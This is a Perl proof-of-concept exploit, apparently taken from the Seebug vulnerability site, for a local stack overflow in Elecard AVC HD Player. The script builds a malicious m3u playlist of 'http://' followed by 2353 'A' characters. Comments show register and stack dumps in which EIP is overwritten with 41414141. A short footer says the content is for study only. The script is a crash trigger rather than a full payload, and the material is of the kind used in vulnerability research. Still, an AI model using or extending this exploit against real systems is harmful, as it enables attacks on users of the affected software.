#!/usr/bin/perl #Elecard AVC HD PLAYER m3u/xpl file Local Stack Overflow POC #Found By AlpHaNiX #From NullArea.Net ########################### # proof of concept ########################### #Stack Get Overflowed Starting from 2353 char #EIP overitten #------------------ # REGISTRES #------------------ #EAX 00000000 #ECX 41414141 #EDX 775A104D ntdll.775A104D #EBX 00000000 #ESP 0012BC9C #EBP 0012BCBC #ESI 00000000 #EDI 00000000 #EIP 41414141 #------------------ # Dump From Stack #------------------ #0012D000 41414141 #0012D004 41414141 #0012D008 41414141 #0012D00C 41414141 #0012D010 41414141 #0012D014 41414141 #0012D018 41414141 #0012D01C 41414141 #0012D020 41414141 #0012D024 41414141 #0012D028 41414141 my $file = "alpix.m3u" ; my $poc="http://"."A" x 2353 ; open(alpix, ">>$file") or die "Cannot open $file"; print alpix $poc; close(alpix); print "\n[+] done ! , $file created";
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论